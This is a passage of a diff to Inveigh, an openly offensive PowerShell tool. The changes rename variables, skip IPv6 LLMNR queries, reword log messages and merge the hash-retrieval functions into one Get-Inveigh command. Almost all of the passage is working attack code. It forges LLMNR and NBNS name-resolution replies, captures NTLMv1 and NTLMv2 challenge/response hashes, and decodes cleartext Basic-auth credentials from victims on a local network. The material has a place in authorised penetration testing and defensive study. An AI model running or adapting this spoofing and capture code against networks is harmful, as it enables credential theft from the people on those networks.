+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
$inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
$inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
}
- if($inveigh.NTLMv1_username_list -notcontains "$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
- $inveigh.NTLMv1_username_list.Add("$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
}
}
@@ -970,36 +977,36 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $source_IP ($HTTP_NTLM_host_string)")])
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
$inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
}
else
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
$inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
}
- if($inveigh.NTLMv2_username_list -notcontains "$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
- $inveigh.NTLMv2_username_list.Add("$source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
}
}
}
- if ($inveigh.IP_capture_list -notcontains $source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
+ if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP)
{
- $inveigh.IP_capture_list.Add($source_IP)
+ $inveigh.IP_capture_list.Add($HTTP_source_IP)
}
$HTTP_response_status_code = 0x32,0x30,0x30
@@ -1022,10 +1029,10 @@ $HTTP_scriptblock =
$authentication_header = $authentication_header -replace 'Basic ',''
$cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
$HTTP_client_close = $true
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $source_IP")])
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")])
$inveigh.cleartext_file_queue.Add($cleartext_credentials)
$inveigh.cleartext_list.Add($cleartext_credentials)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from $source_IP")
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
if($inveigh.file_output)
{
@@ -1194,74 +1201,77 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
while($inveigh.unprivileged_running)
- {
+ {
$LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) # need to switch to async
- $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
- [Array]::Reverse($LLMNR_TTL_bytes)
-
- $LLMNR_response_packet = $LLMNR_request_data[0,1] +
- 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
- $LLMNR_request_data[12..$LLMNR_request_data.Length] +
- $LLMNR_request_data[12..$LLMNR_request_data.Length] +
- $LLMNR_TTL_bytes +
- 0x00,0x04 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
-
- $LLMNR_query_string = $([Text.Encoding]::UTF8.GetString($LLMNR_request_data))
- $LLMNR_query_string = $LLMNR_query_string.SubString(13,($LLMNR_query_string.Length - 18))
- $source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString
- if(($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
- !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
- $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
- {
- $LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port)
- $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint)
- $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
- $LLMNR_UDP_client.Close()
- $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355
- $LLMNR_multicast_group = [IPAddress]"224.0.0.252"
- $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
- $LLMNR_UDP_client.Client.ReceiveTimeout = 5000
- $LLMNR_response_message = "- spoofed response has been sent"
- }
- else
+ if([System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now
{
+ $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
+ [Array]::Reverse($LLMNR_TTL_bytes)
+
+ $LLMNR_response_packet = $LLMNR_request_data[0,1] +
+ 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
+ $LLMNR_request_data[12..$LLMNR_request_data.Length] +
+ $LLMNR_request_data[12..$LLMNR_request_data.Length] +
+ $LLMNR_TTL_bytes +
+ 0x00,0x04 +
+ ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+
+ $LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)])
+ $source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString
- if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
- {
- $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $LLMNR_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
+ if(($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
+ !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
+ $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
{
- $LLMNR_response_message = "- previous capture from $source_IP"
+ $LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port)
+ $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint)
+ $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
+ $LLMNR_UDP_client.Close()
+ $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355
+ $LLMNR_multicast_group = [IPAddress]"224.0.0.252"
+ $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
+ $LLMNR_UDP_client.Client.ReceiveTimeout = 5000
+ $LLMNR_response_message = "- response sent"
}
else
{
- $LLMNR_response_message = "- something went wrong"
- }
+
+ if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
+ {
+ $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
+ }
+ elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
+ {
+ $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
+ }
+ elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+ {
+ $LLMNR_response_message = "- $source_IP is not on reply list"
+ }
+ elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+ {
+ $LLMNR_response_message = "- $source_IP is on ignore list"
+ }
+ elseif($inveigh.IP_capture_list -contains $source_IP)
+ {
+ $LLMNR_response_message = "- previous capture from $source_IP"
+ }
+ else
+ {
+ $LLMNR_response_message = "- something went wrong"
+ }
- }
+ }
- if($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0')
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
- }
+ if($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0')
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+ }
$LLMNR_request_data = ""
+ }
}
@@ -1372,7 +1382,7 @@ $NBNS_spoofer_scriptblock =
$NBNS_UDP_client.Close()
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
- $NBNS_response_message = "- spoofed response has been sent"
+ $NBNS_response_message = "- response sent"
}
else
{
@@ -1407,7 +1417,7 @@ $NBNS_spoofer_scriptblock =
}
else
{
- $NBNS_response_message = "- spoof not sent due to disabled type"
+ $NBNS_response_message = "- disabled NBNS type"
}
if($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255')
@@ -1424,14 +1434,14 @@ $NBNS_spoofer_scriptblock =
$NBNS_bruteforce_spoofer_scriptblock =
{
- param ($SpooferIP,$Hostname,$SpooferTarget,$NBNSBruteForcePause,$NBNSTTL)
+ param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL)
- $Hostname = $Hostname.ToUpper()
+ $NBNSBruteForceHost = $NBNSBruteForceHost.ToUpper()
$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
- $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
+ $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($NBNSBruteForceHost)
$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
$hostname_encoded = $hostname_encoded.Replace("-","")
$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
@@ -1460,11 +1470,11 @@ $NBNS_bruteforce_spoofer_scriptblock =
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
0x00,0x00,0x00,0x00
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget")])
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")])
$NBNS_paused = $false
$NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137)
- $destination_IP = [System.Net.IPAddress]::Parse($SpooferTarget)
+ $destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget)
$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
$NBNS_bruteforce_UDP_client.Connect($destination_point)
@@ -1622,10 +1632,10 @@ function HTTPListener()
$HTTP_powershell = [PowerShell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument($HTTPBasicRealm).AddArgument(
- $HTTPIP).AddArgument($HTTPPort).Addargument($HTTPResponse).AddArgument($NBNSBruteForcePause).AddArgument(
- $WPADAuth).AddArgument($WPADEmptyFile).AddArgument($WPADIP).AddArgument($WPADPort).AddArgument(
- $WPADDirectHosts).AddArgument($WPADResponse).AddArgument($RunCount) > $null
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
+ $HTTPBasicRealm).AddArgument($HTTPIP).AddArgument($HTTPPort).Addargument($HTTPResponse).AddArgument(
+ $NBNSBruteForcePause).AddArgument($WPADAuth).AddArgument($WPADEmptyFile).AddArgument($WPADIP).AddArgument(
+ $WPADPort).AddArgument($WPADDirectHosts).AddArgument($WPADResponse).AddArgument($RunCount) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -1671,7 +1681,7 @@ function NBNSBruteForceSpoofer()
$NBNS_bruteforce_spoofer_powershell.Runspace = $NBNS_bruteforce_spoofer_runspace
$NBNS_bruteforce_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
$NBNS_bruteforce_spoofer_powershell.AddScript($NBNS_bruteforce_spoofer_scriptblock).AddArgument(
- $SpooferIP).AddArgument($Hostname).AddArgument($SpooferTarget).AddArgument(
+ $SpooferIP).AddArgument($NBNSBruteForceHost).AddArgument($NBNSBruteForceTarget).AddArgument(
$NBNSBruteForcePause).AddArgument($NBNSTTL) > $null
$NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null
}
@@ -1935,109 +1945,163 @@ if($inveigh.file_output -and !$inveigh.running)
function Stop-Inveigh
{
- <#
- .SYNOPSIS
- Stop-Inveigh will stop all running Inveigh functions.
- #>
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
- if($inveigh)
+if($inveigh)
+{
+
+ if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
{
- if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+
+ if($inveigh.HTTP_listener.IsListening)
{
+ $inveigh.HTTP_listener.Stop()
+ $inveigh.HTTP_listener.Close()
+ }
+
+ if($inveigh.unprivileged_running)
+ {
+ $inveigh.unprivileged_running = $false
+ Start-Sleep -s 5
+ Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
- if($inveigh.HTTP_listener.IsListening)
+ if($inveigh.file_output)
{
- $inveigh.HTTP_listener.Stop()
- $inveigh.HTTP_listener.Close()
+ "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
}
-
- if($inveigh.unprivileged_running)
- {
- $inveigh.unprivileged_running = $false
- Start-Sleep -s 5
- Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
- }
-
- }
+ }
- if($inveigh.relay_running)
+ if($inveigh.relay_running)
+ {
+ $inveigh.relay_running = $false
+ Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+
+ if($inveigh.file_output)
{
- $inveigh.relay_running = $false
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+ "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+ }
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
- }
+ }
- }
+ if($inveigh.running)
+ {
+ $inveigh.running = $false
+ Write-Output("Inveigh exited at $(Get-Date -format 's')")
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
- if($inveigh.running)
+ if($inveigh.file_output)
{
- $inveigh.running = $false
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+ "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+ }
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
- }
+ }
- }
+ }
+ else
+ {
+ Write-Output("There are no running Inveigh functions")
+ }
+
+ if($inveigh.HTTPS)
+ {
+ & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
- }
- else
+ try
{
- Write-Output("There are no running Inveigh functions")
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
+ $certificate_store.Remove($certificate)
+ $certificate_store.Close()
}
-
- if($inveigh.HTTPS)
+ catch
{
- & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- try
+ if($inveigh.file_output)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
- $certificate_store.Remove($certificate)
- $certificate_store.Close()
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
}
- catch
- {
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
- }
-
- }
}
-
- $inveigh.HTTP = $false
- $inveigh.HTTPS = $false
- }
- else
- {
- Write-Output("There are no running Inveigh functions")|Out-Null
}
+ $inveigh.HTTP = $false
+ $inveigh.HTTPS = $false
+}
+else
+{
+ Write-Output("There are no running Inveigh functions")|Out-Null
+}
+
}
function Get-Inveigh
{
- <#
- .SYNOPSIS
- Get-Inveigh will display queued Inveigh console output.
- #>
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set.
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+#>
+
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($Console -or $PSBoundParameters.Count -eq 0)
+{
while($inveigh.console_queue.Count -gt 0)
{
@@ -2096,279 +2160,200 @@ function Get-Inveigh
}
-function Get-InveighCleartext
+if($Log)
{
- <#
- .SYNOPSIS
- Get-InveighCleartext will get all captured cleartext credentials.
-
- .PARAMETER Unique
- Display only unique cleartext credentials.
- #>
-
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
- )
-
- if($Unique)
- {
- Write-Output $inveigh.cleartext_list | Get-Unique
- }
- else
- {
- Write-Output $inveigh.cleartext_list
- }
-
+ Write-Output $inveigh.log
}
-function Get-InveighNTLMv1
+if($NTLMv1)
{
- <#
- .SYNOPSIS
- Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes.
-
- .PARAMETER Unique
- Display only the first captured challenge/response for each unique account.
-
- .PARAMETER Usernames
- Display IP addresses and usernames for captured NTLMv2 challenge response hashes.
- #>
-
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(Mandatory=$false)][Switch]$Usernames,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
- )
-
- if ($invalid_parameter)
- {
- throw "$($invalid_parameter) is not a valid parameter."
- }
+ Write-Output $inveigh.NTLMv1_list
+}
- if($Unique -and $Usernames)
- {
- throw "Cannot use -Unique with -Usernames."
- }
+if($NTLMv1Unique)
+{
+ $inveigh.NTLMv1_list.Sort()
- if($Unique)
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
{
- $inveigh.NTLMv1_list.Sort()
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
- foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
{
- $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
-
- if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
- {
- Write-Output $unique_NTLMv1
- }
-
- $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ Write-Output $unique_NTLMv1
}
- }
- elseif($Usernames)
- {
- Write-Output $inveigh.NTLMv1_username_list
- }
- else
- {
- Write-Output $inveigh.NTLMv1_list
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
}
}
-function Get-InveighNTLMv2
+if($NTLMv1Usernames)
{
- <#
- .SYNOPSIS
- Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes.
-
- .PARAMETER Unique
- Display only the first captured challenge/response for each unique account.
+ Write-Output $inveigh.NTLMv2_username_list
+}
- .PARAMETER Usernames
- Display IP addresses and usernames for captured NTLMv2 challenge response hashes.
- #>
+if($NTLMv2)
+{
+ Write-Output $inveigh.NTLMv2_list
+}
- param
- (
- [parameter(Mandatory=$false)][Switch]$Unique,
- [parameter(Mandatory=$false)][Switch]$Usernames,
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
- )
+if($NTLMv2Unique)
+{
+ $inveigh.NTLMv2_list.Sort()
- if($invalid_parameter)
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
{
- throw "$($invalid_parameter) is not a valid parameter."
- }
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
- if($Unique -and $Usernames)
- {
- throw "Cannot use -Unique with -Usernames."
- }
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
- if($Unique)
- {
- $inveigh.NTLMv2_list.Sort()
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
- foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
- {
- $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+}
- if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
- {
- Write-Output $unique_NTLMv2
- }
+if($NTLMv2Usernames)
+{
